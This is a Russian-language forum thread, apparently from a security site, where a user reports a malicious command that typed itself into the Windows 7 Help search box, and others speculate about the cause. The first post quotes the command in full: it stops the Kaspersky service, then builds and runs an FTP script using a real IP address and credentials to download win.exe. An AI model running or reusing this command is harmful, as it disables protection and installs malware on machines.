-
Junior Member
- Вес репутации
- 59
про win.exe и как он попадает на машины.
Сегодня наблюдал вот такую картину, установил windows7 [сборка 7229].
Сижу ни кого не трогаю слушаю музыку через foobar. И тут система начинает сама выводить на передний план разные открытые окна, и так случилось что открылась служба спавки и поддержки, и в ней в строке поиска сама! без моего участия набралась строка
net stop kavsvc &echo open 74.208.169.143 21 > il &echo user u52877190-d ddddddd >> il &echo binary >> il &echo get win.exe >> il &echo bye >> il &ftp -n -v -
видимо она должна была отработать в командной строке.
Одно успокоило "Каспера" на машине не использую. Вот такие дела...
Кстати ip реально существует и на нем поднят ftp сервер.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
-
-
-
Как ни странно эти вредоносные файлы легко удаляются с этого фтп сервера
Хотя конечно есть вероятность что они там скоро опять окажутся
-
VirCode, такая мысль была, но не стал...
-
и в ней в строке поиска сама! без моего участия набралась строка
У тебя случаем RAdmin'а нет?)
А вообще забавно, наверное, это лицезреть
Очень похоже на действие Sasser, но что он забыл на Win7
(Совсем параноидально: А может это сами Microsoft делают?)
-
-
Сообщение от
Lexxus
А может это сами Microsoft делают?
Вот засланцы
-